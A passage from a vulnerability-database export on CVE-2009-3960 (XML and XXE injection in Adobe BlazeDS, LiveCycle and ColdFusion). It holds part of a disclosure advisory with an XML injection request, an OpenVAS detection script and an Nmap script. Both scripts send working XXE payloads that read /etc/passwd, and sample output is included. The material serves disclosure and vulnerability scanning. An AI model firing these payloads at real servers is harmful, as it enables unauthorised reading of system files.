URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\n2. Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n3. ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure \r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n4. Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\nThe vendor has released several patches for this \r\nvulnerability. See the Solution section of this \r\ndocument for more information.\r\n\r\n+----------------------------+\r\n|Exploitation - XML Injection|\r\n+----------------------------+\r\n\r\nThe XML parser lacks of proper input and output \r\nvalidation controls. Security-Assessment.com managed\r\nto inject arbitrary XML content which was returned\r\nin the XML response. \r\nThe following table shows an XML injection in the \r\nBlazeDS HTTPChannel. The injected payload becomes \r\npart of the response. In this case, injection is \r\npossible via the \u201cresponseURI\u201d attribute.\r\n\r\nXMLInjection \u2013 BlazeDS - Request\r\n\r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n\r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><body targetURI="" responseURI="d&quot; injectedattr=&quot;anything"><null/>\r\n</body></amfx>\r\n\r\nXMLInjection \u2013 BlazeDS - Response\r\n\r\n<?xml version="1.0" encoding="utf-8"?>\r\n<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>\r\n\r\nThe above injection was successfully tested on \r\nmultiple Adobe products, as shown below:\r\n\r\n1. Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\n2. Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n3. ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure \r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n4. Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\nThe vendor has released several patches for this \r\nvulnerability. See the Solution section of this \r\ndocument for more information.\r\n\r\n\r\n+--------+\r\n|Solution|\r\n+--------+\r\n\r\nSecurity-Assessment.com follows responsible\r\ndisclosure and promptly contacted the vendor after \r\ndiscovering the issues. The vendor was contacted on \r\nthe 6th November 2009 and a reply was received on the\r\nsame day. The vendor released security patches on \r\nthe 11th February 2010.\r\n \r\nThe security patches can be downloaded at the \r\nfollowing website: \r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb10-05.html\r\n\r\n\r\n+------+\r\n|Credit|\r\n+------+\r\n\r\nDiscovered and advised to Adobe in\r\nNovember 2009 by Roberto Suggi Liverani of Security-\r\nAssessment.com. Personal Page: http://malerisch.net/\r\n\r\nFor full details regarding this vulnerability\r\ndownload the PDF from our website:\r\n\r\nhttp://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n\r\n\r\n+---------+\r\n|Greetings|\r\n+---------+\r\n\r\nBug found at Hack in The Sun 2009, Waiheke Island.\r\n\r\n\r\n+-----------------------------+\r\n|About Security-Assessment.com|\r\n+-----------------------------+\r\n\r\nSecurity-Assessment.com is a New Zealand based world\r\nleader in web application testing, network security\r\nand penetration testing. Security-Assessment.com\r\nservices organisations across New Zealand, Australia,\r\nAsia Pacific, the United States and the United\r\nKingdom.\r\n\r\nRoberto Suggi Liverani", "modified": "2010-02-25T00:00:00", "published": "2010-02-25T00:00:00", "id": "SECURITYVULNS:DOC:23288", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23288", "title": "Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2019-02-14T14:49:42", "bulletinFamily": "scanner", "description": "Adobe BlazeDS is prone to an XML-injection vulnerability and an XML External Entity injection vulnerability.", "modified": "2019-02-14T00:00:00", "published": "2015-02-11T00:00:00", "id": "OPENVAS:1361412562310105211", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105211", "title": "Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: sw_adobe_xxe_38197.nasl 13659 2019-02-14 08:34:21Z cfischer $\n#\n# Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities\n#\n# Authors:\n# Christian Fischer <info@schutzwerk.com>\n#\n# Copyright:\n# Copyright (c) 2015 SCHUTZWERK GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105211\");\n script_version(\"$Revision: 13659 $\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities\");\n script_bugtraq_id(38197);\n script_cve_id(\"CVE-2009-3960\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 09:34:21 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-11 14:56:42 +0100 (Wed, 11 Feb 2015)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2015 SCHUTZWERK GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"os_detection.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to obtain sensitive information and carry out other attacks.\");\n script_tag(name:\"vuldetect\", value:\"Send an modificated GET request and check the response\");\n script_tag(name:\"solution\", value:\"Updates are available, please refer to the linked advisory.\");\n script_tag(name:\"summary\", value:\"Adobe BlazeDS is prone to an XML-injection vulnerability and an XML External Entity injection vulnerability.\");\n script_tag(name:\"affected\", value:\"The following applications are affected:\n\n BlazeDS 3.2 and earlier versions\n LiveCycle 9.0, 8.2.1, and 8.0.1\n LiveCycle Data Services 3.0, 2.6.1, and 2.5.1\n Flex Data Services 2.0.1\n ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/38197\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-05.html\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_timeout(600);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = get_http_port( default:80 );\n\nfiles = traversal_files();\nurls = make_list( \"/flex2gateway/\",\n \"/flex2gateway/http\",\n \"/flex2gateway/httpsecure\",\n \"/flex2gateway/cfamfpolling\",\n \"/flex2gateway/amf\",\n \"/flex2gateway/amfpolling\",\n \"/messagebroker/http\",\n \"/messagebroker/httpsecure\",\n \"/blazeds/messagebroker/http\",\n \"/blazeds/messagebroker/httpsecure\",\n \"/samples/messagebroker/http\",\n \"/samples/messagebroker/httpsecure\",\n \"/lcds/messagebroker/http\",\n \"/lcds/messagebroker/httpsecure\",\n \"/lcds-samples/messagebroker/http\",\n \"/lcds-samples/messagebroker/httpsecure\" );\n\nhost = http_host_name( port:port );\n\nuseragent = http_get_user_agent();\n\nforeach url( urls ) {\n\n foreach file( keys( files ) ) {\n\n xxe = '<?xml version=\"1.0\" encoding=\"utf-8\"?>' +\n '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"/' + files[file] + '\"> ]>' +\n '<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">' +\n '<body>' +\n '<object type=\"flex.messaging.messages.CommandMessage\">' +\n '<traits>' +\n '<string>body</string><string>clientId</string><string>correlationId</string>' +\n '<string>destination</string><string>headers</string><string>messageId</string>' +\n '<string>operation</string><string>timestamp</string><string>timeToLive</string>' +\n '</traits><object><traits />' +\n '</object>' +\n '<null /><string /><string />' +\n '<object>' +\n '<traits>' +\n '<string>DSId</string><string>DSMessagingVersion</string>' +\n '</traits>' +\n '<string>nil</string><int>1</int>' +\n '</object>' +\n '<string>&xxe;</string>' +\n '<int>5</int><int>0</int><int>0</int>' +\n '</object>' +\n '</body>' +\n '</amfx>';\n\n len = strlen( xxe );\n\n req = 'GET ' + url + ' HTTP/1.1\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'Accept: */*\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n 'Content-Type: application/x-amf\\r\\n' +\n '\\r\\n' +\n xxe;\n\n buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\n if( egrep( string:buf, pattern:file, icase:TRUE ) ) {\n report = report_vuln_url( url:url, port:port );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nmap": [{"lastseen": "2018-07-12T16:22:05", "bulletinFamily": "scanner", "description": "Exploits cve-2009-3960 also known as Adobe XML External Entity Injection. \n\nThis vulnerability permits to read local files remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0 \n\nFor more information see: \n\n * http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\n * http://www.osvdb.org/62292\n * Metasploit module: auxiliary/scanner/http/adobe_xml_inject\n\n### See also:\n\n * http-adobe-coldfusion-apsa1301.nse \n * http-coldfusion-subzero.nse \n * http-vuln-cve2010-2861.nse \n\n## Script Arguments \n\n#### http-vuln-cve2009-3960.root \n\nPoints to the root path. Defaults to \"/\"\n\n#### http-vuln-cve2009-3960.readfile \n\ntarget file to be read. Defaults to \"/etc/passwd\"\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root=\"/root/\" <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http\n | http-vuln-cve2009-3960:\n | samples/messagebroker/http\n | <?xml version=\"1.0\" encoding=\"utf-8\"?>\n | <amfx ver=\"3\"><body targetURI=\"/onResult\" responseURI=\"\"><object type=\"flex.messaging.messages.AcknowledgeMessage\"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash\n | bin:*:1:1:bin:/bin:/sbin/nologin\n | daemon:*:2:2:daemon:/sbin:/sbin/nologin\n | adm:*:3:4:adm:/var/adm:/sbin/nologin\n | lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin\n | sync:*:5:0:sync:/sbin:/bin/sync\n | shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown\n | halt:*:7:0:halt:/sbin:/sbin/halt\n | mail:*:8:12:mail:/var/spool/mail:/sbin/nologin\n | news:*:9:13:news:/etc/news:\n | uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin\n | operator:*:11:0:operator:/root:/sbin/nologin\n | games:*:12:100:games:/usr/games:/sbin/nologin\n | gopher:*:13:30:gopher:/var/gopher:/sbin/nologin\n | ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin\n | nobody:*:99:99:Nobody:/:/sbin/nologin\n | nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin\n | vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin\n | pcap:!!:77:77::/var/arpwatch:/sbin/nologin\n | mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin\n | ...\n |_\n\n## Requires \n\n * http\n * shortport\n * stdnse\n * string\n * table\n * vulns\n\n* * *\n", "modified": "2017-06-27T15:01:27", "published": "2012-01-02T19:48:42", "id": "NMAP:HTTP-VULN-CVE2009-3960.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2009-3960.html", "title": "http-vuln-cve2009-3960 NSE Script", "type": "nmap", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nExploits cve-2009-3960 also known as Adobe XML External Entity Injection.\n\nThis vulnerability permits to read local files remotely and is present in\nBlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data\nServices 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and\nColdFusion 7.0.2, 8.0, 8.0.1, and 9.0\n\nFor more information see:\n* http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\n* http://www.osvdb.org/62292\n* Metasploit module: auxiliary/scanner/http/adobe_xml_inject\n]]\n\n---\n-- @see http-adobe-coldfusion-apsa1301.nse\n-- @see http-coldfusion-subzero.nse\n-- @see http-vuln-cve2010-2861.nse\n--\n-- @args http-vuln-cve2009-3960.root Points to the root path. Defaults to \"/\"\n-- @args http-vuln-cve2009-3960.readfile target file to be read. Defaults to \"/etc/passwd\"\n--\n-- @usage\n-- nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root=\"/root/\" <target>\n--\n--@output\n-- PORT STATE SERVICE\n-- 80/tcp open http\n--| http-vuln-cve2009-3960:\n--| samples/messagebroker/http\n--| <?xml version=\"1.0\" encoding=\"utf-8\"?>\n--| <amfx ver=\"3\"><body targetURI=\"/onResult\" responseURI=\"\"><object type=\"flex.messaging.messages.AcknowledgeMessage\"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash\n--| bin:*:1:1:bin:/bin:/sbin/nologin\n--| daemon:*:2:2:daemon:/sbin:/sbin/nologin\n--| adm:*:3:4:adm:/var/adm:/sbin/nologin\n--| lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin\n--| sync:*:5:0:sync:/sbin:/bin/sync\n--| shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown\n--| halt:*:7:0:halt:/sbin:/sbin/halt\n--| mail:*:8:12:mail:/var/spool/mail:/sbin/nologin\n--| news:*:9:13:news:/etc/news:\n--| uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin\n--| operator:*:11:0:operator:/root:/sbin/nologin\n--| games:*:12:100:games:/usr/games:/sbin/nologin\n--| gopher:*:13:30:gopher:/var/gopher:/sbin/nologin\n--| ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin\n--| nobody:*:99:99:Nobody:/:/sbin/nologin\n--| nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin\n--| vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin\n--| pcap:!!:77:77::/var/arpwatch:/sbin/nologin\n--| mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin\n--| ...\n--|_\n\nauthor = \"Hani Benhabiles\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\", \"intrusive\", \"vuln\"}\n\n\nportrule = shortport.http\n\naction = function(host, port)\n -- Matching returned response body to confirm vulnerability\n local matchstart = '<?xml version=\"1.0\" encoding=\"utf-8\"?>'\n local matchend = '</string><null/></object></body></amfx>'\n local matchsize = 120\n local matchnotvuln = '<string>External entities are not allowed</string>'\n\n local results = {}\n local root = stdnse.get_script_args(SCRIPT_NAME .. \".root\") or \"/\"\n local readfile = stdnse.get_script_args(SCRIPT_NAME .. \".readfile\") or \"/etc/passwd\"\n\n local paths = {\n \"messagebroker/http\",\n \"messagebroker/httpsecure\",\n\n -- Coldfusion\n \"flex2gateway/http\",\n \"flex2gateway/httpsecure\",\n\n -- BlazeDS\n \"blazeds/messagebroker/http\",\n \"blazeds/messagebroker/httpsecure\",\n \"samples/messagebroker/http\",\n \"samples/messagebroker/httpsecure\",\n\n -- LiveCycle Data Services\n \"lcds/messagebroker/http\",\n \"lcds/messagebroker/httpsecure\",\n \"lcds-samples/messagebroker/http\",\n \"lcds-samples/messagebroker/httpsecure\",\n }\n\n local exploit = [[<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE test\n [ <!ENTITY x3 SYSTEM \"]].. readfile\n .. [[\"> ]><amfx ver=\"3\"\n xmlns=\"http://www.macromedia.com/2005/amfx\"><body>\n <object type=\"flex.messaging.messages.CommandMessage\">\n <traits><string>body</string><string>clientId</string>\n <string>correlationId</string><string>destination</string>\n <string>headers</string><string>messageId</string><string>\n operation</string><string>timestamp</string><string>timeToLive\n </string></traits><object><traits /></object><null /><string />\n <string /><object><traits><string>DSId</string><string>\n DSMessagingVersion</string></traits><string>nil</string>\n <int>1</int></object><string>&x3;</string><int>5</int>\n <int>0</int><int>0</int></object></body></amfx>]]\n\n\n local options = {header={[\"Content-Type\"]=\"application/x-amf\"}}\n local path\n\n local http_vuln = {\n title = \"Adobe XML External Entity Injection\",\n IDS = {CVE = 'CVE-2009-3960'},\n risk_factor = \"High\",\n scores = {\n CVSSv2 = \"4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:N/A:N)\",\n },\n description = [[\nPermits to read local files remotely and is present in\nBlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data\nServices 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and\nColdFusion 7.0.2, 8.0, 8.0.1, and 9.0]],\n references = {\n 'http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf',\n 'http://www.osvdb.org/62292'\n },\n dates = {\n disclosure = {year = '2010', month = '02', day = '15'},\n },\n exploit_results = {},\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n http_vuln.state = vulns.STATE.NOT_VULN\n\n for _,path in pairs(paths) do\n local uri = root .. path\n local response = http.post(host, port, uri, options, nil, exploit)\n\n if response.status == 200 then\n if #response.body >= matchsize and\n string.sub(response.body,1,string.len(matchstart))==matchstart and\n string.sub(response.body,-string.len(matchend))==matchend and\n string.match(response.body, matchnotvuln)==nil\n then\n table.insert(results, {'File: ' .. readfile .. ' extracted via ' .. path .. '\\n\\n',{response.body}})\n http_vuln.extra_info = stdnse.format_output(true, results)\n http_vuln.state = vulns.STATE.EXPLOIT\n end\n end\n end\n\n return report:make_output(http_vuln)\nend\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}
